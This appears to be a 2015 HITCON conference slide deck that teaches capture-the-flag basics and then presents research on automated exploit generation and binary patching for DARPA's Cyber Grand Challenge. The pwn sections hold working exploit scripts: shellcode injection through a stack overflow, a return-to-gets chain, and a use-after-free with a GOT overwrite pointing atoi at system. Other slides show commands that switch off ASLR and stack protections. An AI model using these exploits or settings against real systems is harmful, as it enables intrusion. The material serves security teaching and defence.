CTF: Hello, World!
HITCON 2015 CTF Conference
Dec. 5 – Dec. 6, 2015

Shih-Kun Huang, Chiao Tung University <[email protected]>
Chun-Ying Huang, Ocean University <[email protected]>
How Do You Feel?
If You Were a…
• Programmer: debugging, patching, cleaning up (CTF)
• Hacker: finding bugs, coercing, controlling (CTF)
• Robot: symbolic computation, machine learning; CRS: automated reasoning system (CGC)
Outline
• CTF and AIS3 Final CTF
• CTF Server Setup
• Simple Practices
  • Crypto
  • Pwn1
  • Pwn3
• From CTF to CGC
CTF
• Type of CTFs
  • Jeopardy – any type of problems
  • Attack and Defense – Pwn + Patch
  • King of the Hill – Pwn + Patch
• AIS3 Final CTF
  • Jeopardy style
  • Misc, Binary, Pwn, Web, Crypto
CTF Server Setup
• Real server (Linux x64) + QEMU
• Tricks for simple CTF
  • x86 or x64
  • Disable stack protector
  • Allow code execution in stack
  • Disable ASLR

$ gcc -m32 -fno-stack-protector -z execstack hello.c -o hello
Simple Buffer Overflow
• Outdated implementation
• Input "A"*20

#include <stdio.h>

int func1(int a, int b, int c) {
    char buffer[8];   // declare a character array of 8 bytes
    gets(buffer);     // read user input string (no length limit)
    return 0;         // return zero
}

[Stack diagram: buffer[8] sits in the current stack frame, followed by the saved EBP and the return address, then the arguments a, b, c in the last stack frame; the stack grows from 0xffffffff toward 0x00000000. After the input "A"*20, buffer, the saved EBP and the return address all read 0x41414141.]
Stack Protector
• With stack protector
• Input "A"*20

[Stack diagram: with the stack protector a canary is placed between buffer[8] and the saved EBP / return address. After the input "A"*20 the buffer, the canary, the saved EBP and the return address all read 0x41414141; the overwritten canary is noticed when the function returns.]
Code Execution in Stack
• Test if a binary enables code execution in stack
• Enable code execution in stack (you may need the 'execstack' package)

$ execstack -c /path/to/myprog     # disallow executable stack
$ execstack -q /path/to/myprog
- /path/to/myprog
$ execstack -s /path/to/myprog     # allow executable stack
$ execstack -q /path/to/myprog
X /path/to/myprog

$ readelf -l /path/to/myprog.set | grep -i stack
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10
$ readelf -l /path/to/myprog.clear | grep -i stack
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10
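The same check that execstack -q and readelf -l make above can be done by reading the ELF program headers directly. The following is an added example (not code from the slides): it reports whether the PT_GNU_STACK segment asks for an executable stack, and goes slightly beyond the slide by handling both ELF32 and ELF64 images in either byte order. make_elf() builds a constructed minimal ELF image so the check runs offline; the "no PT_GNU_STACK means executable" rule is an assumption based on Linux's historical default.

```python
import struct

PT_GNU_STACK = 0x6474E551   # the program header type readelf prints as GNU_STACK
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4

def gnu_stack_flags(elf):
    """Return the p_flags of the PT_GNU_STACK segment, or None if there is none."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = elf[4] == 2                  # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if elf[5] == 1 else ">"   # EI_DATA: 1 = little endian, 2 = big endian
    if is64:
        phoff = struct.unpack_from(end + "Q", elf, 0x20)[0]
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 0x36)
    else:
        phoff = struct.unpack_from(end + "I", elf, 0x1C)[0]
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 0x2A)
    for i in range(phnum):
        off = phoff + i * phentsize
        p_type = struct.unpack_from(end + "I", elf, off)[0]
        # p_flags follows p_type in Elf64_Phdr but sits near the end of Elf32_Phdr
        p_flags = struct.unpack_from(end + "I", elf, off + (4 if is64 else 24))[0]
        if p_type == PT_GNU_STACK:
            return p_flags
    return None

def stack_is_executable(elf):
    """True when the loader will map the stack executable (the 'RWE' case in readelf)."""
    flags = gnu_stack_flags(elf)
    if flags is None:
        # No PT_GNU_STACK at all: Linux historically falls back to an executable
        # stack, so treat the binary as executable-stack (assumption, see lead-in).
        return True
    return bool(flags & PF_X)

def execstack_query(elf, path):
    """Mirror the one-line report of 'execstack -q': 'X' executable, '-' otherwise."""
    return ("X " if stack_is_executable(elf) else "- ") + path

def make_elf(is64, stack_flags):
    """Constructed minimal little-endian ELF image with one PT_GNU_STACK header."""
    if is64:
        ehdr = struct.pack("<4sBBBBB7sHHIQQQIHHHHHH", b"\x7fELF", 2, 1, 1, 0, 0, b"\0" * 7,
                           2, 62, 1, 0, 64, 0, 0, 64, 56, 1, 0, 0, 0)
        phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    else:
        ehdr = struct.pack("<4sBBBBB7sHHIIIIIHHHHHH", b"\x7fELF", 1, 1, 1, 0, 0, b"\0" * 7,
                           2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
        phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(execstack_query(f.read(), path))
```

Run it on a real binary as `python3 check_stack.py /path/to/myprog` (the -z execstack build from the server-setup slide should report "X").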
ASLR
• Address Space Layout Randomization
• Randomized address for heap and stack
• Disable ASLR
  echo 0 > /proc/sys/kernel/randomize_va_space
• Randomized stack spaces
  echo 1 > /proc/sys/kernel/randomize_va_space
• Randomized heap and stack spaces (Ubuntu default)
  echo 2 > /proc/sys/kernel/randomize_va_space
ASLR (Cont'd)
• Without ASLR (0): three runs give identical addresses

$ ./a.out
main = 0x80484cd
gets = 0x8048380
 buf = 0xffffd3ac
 m = 0x804b008
$ ./a.out
main = 0x80484cd
gets = 0x8048380
 buf = 0xffffd3ac
 m = 0x804b008
$ ./a.out
main = 0x80484cd
gets = 0x8048380
 buf = 0xffffd3ac
 m = 0x804b008

• With ASLR (1, 2): the stack buffer and the heap block move on every run, while main and gets (addresses inside the non-PIE binary) stay put

$ ./a.out
main = 0x80484cd
gets = 0x8048380
 buf = 0xffdf6d8c
 m = 0x9b03008
$ ./a.out
main = 0x80484cd
gets = 0x8048380
 buf = 0xff86930c
 m = 0x9b1e008
$ ./a.out
main = 0x80484cd
gets = 0x8048380
 buf = 0xfff9b4bc
 m = 0x88f3008

The test program:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    char buf[64];
    printf("main = %p\n", main);
    printf("gets = %p\n", gets);
    printf(" buf = %p\n", buf);
    printf(" m = %p\n", malloc(16));
    return 0;
}
Misc. Issue – xinetd

service gagb
{
    disable     = no
    type        = UNLISTED
    id          = gagb
    socket_type = stream
    protocol    = tcp
    user        = gagb
    group       = gagb
    wait        = no
    server      = /home/gagb/gagb
    port        = 9192
}
Misc. Issues – Buffering Mode
• stdin/stdout buffering mode
  • Line buffered
  • Fully buffered
  • Not buffered

setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
Misc. Issues – Permissions
• Disable access for…
• Firewall setup
  • Default policy is DROP
  • Only allow required incoming ports
  • Disallow outgoing connections

chmod 751 /
chmod 751 /etc
chmod 750 /sbin
chmod 750 /usr/sbin
chmod 551 /proc
chmod 551 /dev
chmod 711 /home
chmod 1773 /tmp
...
cd $HOME
chown root:$OWNER . binary flag
chmod 550 . binary
chmod 440 flag
Simple Practices
• A simple server for CTF: Hello, World!
• 1 crypto and 2 pwns (flag @ /home/*/flag)
• HITCON CTF only: accessible on Dec. 5 and Dec. 6
http://54.xxx.yyy.zzz/fun.html
PLEASE, PLEASE, PLEASE DON'T HACK OUR MACHINE ~>_<~
Some Backgrounds
• Programming in the UNIX (Linux) environment
• A little bit of x86 assembly
• Python
• Pwntools
• Patience
Practice: Crypto – cry2
Host: 54.xxx.yyy.zzz  Port: 5566
Hint: the source code
Origin: dada@nctu
cry2 – The First Impression
cry2 – The Source Code

import random
import string
from Crypto.Cipher import AES

key = "XXXXXXXXXXXXXXXX"
iv = ''.join(random.choice(string.hexdigits) for _ in range(16))
flag = "ais3{NEVERPHDNEVERPHDNEVERPHD..}" # Not real flag
...
def encrypt(p):
    # the same key AND the same iv are used for every call
    return AES.new(key, AES.MODE_OFB, iv).encrypt(p)
...
print encrypt(flag).encode("hex")
while True:
    ...
    p = ''.join(random.choice(string.lowercase) for _ in range(32))
    print encrypt(p).encode("hex")
cry2 – Output Feedback (OFB) Mode

[Diagram: OFB mode. The initial vector (IV) goes through the block cipher encryption (AES) under the key; the output block is XORed with the first plaintext block to give the first ciphertext block and is also fed back as the input of the next block cipher encryption, which produces the keystream for the second block, and so on.]
cry2 – Misuse of OFB Mode

[Diagram: because the key and the IV never change, the keystream is the same for every message, so each 32-byte string of lowercase alphabets is XORed with the same 32-byte XOR-pad to produce the ciphertexts output from cry2.]
cry2 – Solution: Collecting Ciphers

Ciphertexts collected from cry2 (each one is 32 bytes, printed as 64 hex characters), e.g.:
...
9b558a66b337dcb45d6d0fe457a5705752aaf4170fac345b62c74b3c1b874a9e
9b40966ba021dca3556b02fe50b068444ea9e81018b323447bc34a2900835699
9354946aa820c4b049631bfa5dab69434da6f0051aa73f4b66ce4b2715864784

The first ciphertext the service prints (the encrypted flag) is what we really want to decode. Byte positions 0 to 31 line up column by column across all the collected ciphertexts.
cry2 – Use Pwntools
• Pwntools
  • A good CTF framework implemented in Python
  • https://github.com/Gallopsled/pwntools
• Quick installation guide (Ubuntu)

$ sudo apt-get install binutils python-dev python-pip
$ sudo pip install pwntools
cry2 – Enumerate All Ciphertexts

#!/usr/bin/env python
from pwn import *

#r = remote('54.xxx.yyy.zzz', 5566)
r = process("./src.py")
ciphers = []
while len(ciphers) < 100:
    s = r.recvline().strip()
    if len(s) == 64:          # keep only the 64-hex-character ciphertext lines
        ciphers.append(s)
    r.send('\n')              # ask the service for the next one
cry2 – Pseudocode to Obtain the XOR-Pad

Given c: the list containing n ciphertexts (except the first one)
    c = [ c1, c2, c3, …, cn ]
Suppose c(u,v) represents the vth byte in ciphertext cu, 1 ≤ u ≤ n

pad = ""
for v = 1 to 32:
    for x = 0 to 255:
        if x XOR c(u,v) is a lowercase alphabet for all u in [1, n]:
            pad = pad + x
            break
use pad to decrypt the real ciphertext and obtain the flag
cry2 – Security Practice
• Correct use of cipher modes
• Must be initialized with different IVs
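To make the pad-recovery pseudocode and the different-IV rule concrete, here is an added example (not the workshop's code) that simulates cry2 end to end: with one fixed IV, the pad recovered from lowercase-only samples decrypts the flag; with a fresh IV per message, the same search finds no consistent pad at all. The key, IVs, flag and the 26 sample plaintexts are constructed values, and a keyed hash stands in for the AES block function (the weakness is in the IV handling, not in the cipher).

```python
import hashlib
import string

ALPHABET = string.ascii_lowercase.encode()

def block_encrypt(key, block):
    # Stand-in for AES (assumption): a keyed hash truncated to one 16-byte block.
    return hashlib.sha256(key + block).digest()[:16]

def ofb_keystream(key, iv, nbytes):
    out, prev = b"", iv
    while len(out) < nbytes:
        prev = block_encrypt(key, prev)   # feed the previous output block back in
        out += prev
    return out[:nbytes]

def ofb_encrypt(key, iv, plaintext):
    ks = ofb_keystream(key, iv, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))

def recover_pad(ciphers, alphabet=ALPHABET):
    """The search from the pseudocode slide, plus one check: at every position
    exactly one x must map all ciphertext bytes into the alphabet, else None."""
    pad = bytearray()
    for v in range(len(ciphers[0])):
        fits = [x for x in range(256) if all((c[v] ^ x) in alphabet for c in ciphers)]
        if len(fits) != 1:
            return None
        pad.append(fits[0])
    return bytes(pad)

KEY = b"0123456789abcdef"                   # constructed 16-byte key
FLAG = b"ais3{ofb_iv_reuse_leaks_the_pad}"  # constructed 32-byte flag, like the real one
FIXED_IV = b"fedcba9876543210"              # constructed 16-byte IV

def sample_plaintexts():
    # Constructed stand-in for the service's random lowercase strings: 26 rotations
    # of the alphabet, so every byte position sees every letter (pad is unique).
    return [bytes(ALPHABET[(i + j) % 26] for j in range(32)) for i in range(26)]

def demo(reuse_iv):
    """Simulate cry2. reuse_iv=True is the bug (one IV for every message);
    reuse_iv=False gives each message its own IV, as the security-practice slide says.
    Returns the decrypted flag, or None when no consistent pad exists."""
    flag_ct = ofb_encrypt(KEY, FIXED_IV, FLAG)
    ciphers = []
    for i, p in enumerate(sample_plaintexts(), start=1):
        iv = FIXED_IV if reuse_iv else i.to_bytes(16, "big")   # fresh per-message IV
        ciphers.append(ofb_encrypt(KEY, iv, p))
    pad = recover_pad(ciphers)
    if pad is None:
        return None
    return bytes(c ^ k for c, k in zip(flag_ct, pad))

if __name__ == "__main__":
    print("same IV for every message :", demo(True))
    print("fresh IV for every message:", demo(False))
```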
Practice: Pwn1 – gagb
Host: 54.xxx.yyy.zzz  Port: 9192
Hint: the binary
Origin: chun-ying
gagb – The First Impression

gagb – Let's Look at the Binary (IDA Pro)

gagb – Let's Look at the Binary (IDA Pro – Pseudocode View)

gagb – The Problem
gagb – Solution
• Eh… We have to guess the number first!!
• Strategy #1: Play with the game
  • Pwntools: recv, send… try all possible combinations
• Strategy #2: Use the random number trick
  • Remember we have: srand(time(0)) + rand()?
  • In Python, we can do:

from ctypes import *
cdll.LoadLibrary("libc.so.6")
libc = CDLL("libc.so.6")
libc.srand(libc.time(0))   # same seed as the target: the current time in seconds
print libc.rand()
gagb – A Tricky Solution

from pwn import *            # process() is from pwntools
from ctypes import *
libc = CDLL("libc.so.6")
libc.srand(libc.time(0))     # seeded exactly like the target (previous slide)
r = process("./gagb")
num = ""
while len(num) < 4:
    while True:
        d = chr(libc.rand() % 10 + 48)          # next digit the target will draw
        if len(set(num + d)) == len(num + d):   # keep only distinct digits
            num = num + d
            break
print r.recv()
print num
r.send(num + '\n')
print r.recv()

• Use ntpdate to synchronize your system clock
• You may need to uncheck "Hardware Clock in UTC Time" if you are playing with VirtualBox or other virtual machines…
gagb – The Overflow Part: Strategy #1
• The old tricks
• You have to guess the stack address
• Fill "A"*28 + addr + NOP*n + shellcode

context(arch = 'i386', os = 'linux')
...
shell = asm(shellcraft.sh())
r.send('A'*28 + p32(0xffffdd70) + "\x90" * 400 + shell + "\n")
r.interactive()
gagb – The Overflow Part: Strategy #1 (Cont'd)

[Stack diagram: s[24] is followed by the saved EBP and the return address in the current stack frame. After the input, s and EBP hold 0x4141...41, the return address is overwritten with a guessed stack address ("jump to stack"), and above it lie the NOP sled (0x90909090 ...) followed by the shellcode.]
gagb – The Overflow Part: Strategy #2 (1/3)
• We would not like to guess anymore :(
• Ask 'gets()' to do something for us
• Remember that 'gets()' requires one argument – the address to store the user input string
gagb – The Overflow Part: Strategy #2 (2/3)
• We want the stack to look like…

[Stack diagram: s[24] and the saved EBP are filled with garbage; the return address slot holds the address of gets(); the next two slots hold the return address after gets() and gets()'s argument #1, the address for gets() to fill.]
gagb – The Overflow Part: Strategy #2 (3/3)
• gets@plt can be obtained using objdump -d gagb
• After gets() finished, the program jumps to the buffer that we have filled with the shellcode

r.send('A'*28 + p32(0x08048430)                 # gets@plt
       + p32(0x0804a034) + p32(0x0804a034)      # any writable address
       + p32(0x12345678) * 100 + "\n")          # garbage
r.send(shell + "\n")                            # fill gets() buffer
r.interactive()

08048430 <gets@plt>:
 8048430: ff 25 0c a0 04 08    jmp *0x804a00c        ; in GOT table
 8048436: 68 00 00 00 00       push $0x0
 804843b: e9 e0 ff ff ff       jmp 8048420 <gets@plt-0x10>
gagb – Security Practice
• No more gets()
• Use /dev/urandom or /dev/random
• Or, alternatively, at least do

srand(time(0) ^ getpid());
Practice: Pwn3 – phddb
Host: 54.xxx.yyy.zzz  Port: 3333
Hint: the binary, and the system C library
Origin: angelboy @ncu
phddb – The First Impression

phddb – Let's Look at the Binary (Assembly)
We have symbols

phddb – Let's Look at the Binary (Pseudocode)
phddb – Feature Summary
• Data stored in heap – use malloc()
• dump
• add
  • Allocate header first (32 bytes)
  • Allocate thesis text according to the given length
• edit
  • Modify header content
  • Reallocate thesis text if necessary
• remove

[Heap diagram: each record header holds name[20], age, length and *thesis; *thesis points to a separately allocated thesis-text chunk. Record #0 and Record #1 are laid out one after the other.]
phddb – The Problem: editphd()

realloc(ptr, 0) == free(ptr) !?
phddb – Solution (1/6)
1. Add two records
2. Edit record #0
3. Add one more record

[Heap diagram, three stages: (1) Record #0 (name aaa, length 32) and Record #1 (name bbb, length 32) each have their own thesis-text chunk. (2) Editing record #0 so that its thesis text is reallocated with length 0 makes realloc(ptr, 0) free that chunk, while record #0's *thesis still points to it. (3) Adding Record #2 (name ccc, length 32) reuses the freed chunk for Record #2's header, so record #0's stale thesis pointer now aliases Record #2's header.]
phddb – Solution (2/6)
• We want to know the real address of atoi in memory
• We can then know the C library base
  • Real address of atoi minus atoi's offset in C library
  • Use objdump -d libc.so.6 to get atoi's offset
• From objdump -d phddb, we got the GOT entry address for atoi is 0x804b03c

08048560 <atoi@plt>:
 8048560: ff 25 3c b0 04 08    jmp *0x804b03c
 8048566: 68 60 00 00 00       push $0x60
 804856b: e9 20 ff ff ff       jmp 8048490 <_init+0x30>
phddb – Solution (3/6)
• Edit record #0
• Fill thesis text using:
  • "A"*24
  • 0x20 (length)
  • 0x804b03c
• GOT entry is a function pointer to the real address of a function (in .so)
• Dump record #2
• Reveal atoi (?)

[Diagram: the write through record #0's stale thesis pointer lands in Record #2's header, so its name/age become "A"*24, its length 0x20 and its *thesis the GOT entry of atoi at 0x804b03c (next to the neighbouring GOT entries at 0x804b038 and 0x804b040, one of which is c99_scanf). Dumping record #2 therefore prints the contents of that GOT entry.]
phddb – Solution (4/6)
• The atoi's real address is right after the third colon ':' (0x3a)
• Note: it's little endian

6e 61 6d 65 3a 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 20 0a 61
67 65 3a 31 30 39 34 37 39 35 35 38 35 0a 74 68
65 73 69 73 3a 0a 60 95 e5 f7 0a 7c 2d 2d 2d 2d
2d 2d 2d 2d 2d 2d 50 48 44 64 62 20 4d 65 6e 75
phddb – Solution (5/6)
• Recall that the main function does read() + atoi()
• We can replace atoi's GOT entry value with any function we want to call
• Replace atoi's GOT entry value with the real address of system(), and then send 'sh\n'
• Simple arithmetic
  • atoi's real address = 0xf7e59560
  • atoi offset in C library = 0x31560
  • system offset in C library = 0x3fcd0
  • system's real address = 0xf7e59560 – 0x31560 + 0x3fcd0 = 0xf7e67cd0
phddb – Solution (6/6)
• Edit record #0
• Fill thesis text using:
  • "A"*24
  • 0x20 (length)
  • 0xf7e67cd0
• read() + atoi() now becomes read() + system()
• Send 'sh\n'

[Diagram: same heap layout as before; the GOT entry at 0x804b03c, which held atoi (0xf7e59560), now holds system (0xf7e67cd0).]
phddb – Security Practice
• GOT hijacking
• Never use-after-free
• Special case of realloc(ptr, size)
From CTF to CGC
From capturing flags with human intelligence to automatic attack and defense with artificial intelligence
Security is Bugs. (From Linus Torvalds)
From CTF to CGC
• The Cyber War
  • Cyber Army
• Capture The Flag (CTF)
  • Information security competition
• Cyber Grand Challenge (CGC)
  • All-computer CTF tournament
  • Held by DARPA of US DoD with the DEFCON Conference in Las Vegas in 2016
Objective
• Build a Cyber Reasoning System (CRS)
  • Follow CGC rules
  • Automatic attack and defense
• Automatic Attack
  • Analyze the program binary to find the failure
  • Generate exploit
  • Payload to bypass mitigation
• Automatic Defense
  • Analyze the program to find the fault
  • Find the faulty point
  • Patch the fault at the binary level
Software Exploitation Framework

[Diagram: the exploitation stages Pre-Exploitation, Peri-Exploitation, End-Exploitation and Post-Exploitation, spanning from security auditing tools (nessus, metasploit, sqlmap) to developer bug forensic tools.]
CRS Integration for CGC – Attack
● Target-aware Symbolic Fuzzing
● Automatic Exploit Generation
● Anti-Mitigation Payload Generation
● Post Exploitation Integration
(Fuzzer; probe, coerce, hide, control)
CRS Integration for CGC – Defense
● Fault Localization (path)
● Data Slicing (data)
● Patching Site Isolation
(probe, fix, patch, clean)
Automatic Attack
Integration
● Automatic Exploit Generation (CRAX)
● Post Exploitation Framework (Metasploit)
Integration – CRAX

Integration – CRAX with ROP
Result – Compare with ROPgadget
• ROPgadget: common open source tool to search and chain gadgets

Tool Compare    Exploit Strengthening              ROPgadget
Gadget Type     Long/Short Gadgets                 Short Gadgets
Payload Type    Turing complete ROP Payload API    One type payload
Integrate       CRAX + Metasploit                  -
Result – Compare with ROPgadget
• Payload type: execve("/bin/sh")

Program Name      Program Size   Exploit Strengthening                    ROPgadget
                                 Total Gadgets  Time   Generate Payload   Time   Generate Payload
gdb 7.7.1         4.9M           133K           36.2s  True               278s   True
nautilus 3.10.1   1.4M           58K            13.9s  True               --     False
gpg 1.4.16        971K           25K            5.5s   True               17.1s  True
vim.tiny 7.4      806K           25K            5.0s   True               --     False
lshw b.02.16      755K           8K             2.4s   True               --     False
gcc 4.8           700K           4K             2.9s   True               10.7s  True
objdump 2.24      333K           8K             1.4s   True               --     False
readom 1.1.11     180K           4.9K           0.9s   True               --     False
curl 7.35.0       149K           2.9K           0.7s   True               --     False
factor 8.21       104K           2.3K           0.5s   True               --     False
Result – with Different Program Size
● Forty programs in /usr/bin, size between 100KB and 5MB.
Automatic Defense
Method – CRS Architecture
Method – Dstar algorithm
• CF: Covered & Failed
• CS: Covered & Successful
• UF: Uncovered & Failed
• US: Uncovered & Successful
• Calculate the ranking from the Dstar formula
Method – Dynamic Slicing
• An entire program tree → a path
• We need more information for patching
Method – Dynamic Slicing
Method – Patching
• According to the CGC rule, CRS must patch the binary program without source code
• There are different tricks to patch different faults
• We must analyze the type of fault before patching it
  • Our CRS is targeted at stack-based buffer overflow
Evaluation
• 24 challenge binaries (CB) for testing
• The fault types include:
  • CWE-121: Stack-based Buffer Overflow
  • CWE-122: Heap-based Buffer Overflow
  • CWE-787: Out-of-bounds Write
  • CWE-476: NULL Pointer Dereference
  • …
• We choose the stack-based overflow CBs to evaluate our CRS.
Evaluation – Summary

Challenge id   Fault type   Method 1                   Method 2
                            Availability   Security    Availability   Security
CADET_00001    2            Success        Success     Success        Success
CROMU_00007    3            Failed         Success     Failed         Failed
KPRCA_00001    1            Failed         Failed      Success        Success
LUNGE_00005    3            Failed         Failed      Success        Success
NRFIN_00003    2            Success        Success     Failed         Failed
Evaluation – Preliminary Scored Event

Challenge id   Availability   Security   Both   Total
CADET_00001    72             44         37     80
CROMU_00007    20             12         9      25
KPRCA_00001    126            121        116    139
LUNGE_00005    61             33         27     70
NRFIN_00003    58             24         9      79
Conclusions
• We propose an automatic binary patch method for CGC
  • Fault localization
  • Binary patch
• Our method can succeed in patching five challenge binaries
  • Only fail in one availability test
  • All security tests pass
Related Systems
• CRAX
  • Automatic Exploit Generation (non-web exploit generation)
  • https://github.com/SQLab/CRAX
• CRAXWeb
  • Web Exploit Generation (web exploit generation)
  • https://github.com/SQLab/CRAXWeb
• Ropchain (ROP payload generation bypassing ASLR and DEP)
  • ROP Payload Generation
  • https://github.com/SQLab/ropchain
• CRAXfuzz
  • Symbolic Fuzzing Framework (fuzz testing in symbolic form)
• CRAXcrs
  • Automatic Defense by Fault Localization and Dynamic Patch (automated defense achieved through fault localization and automatic patching)
Q&A
Thanks for your attention!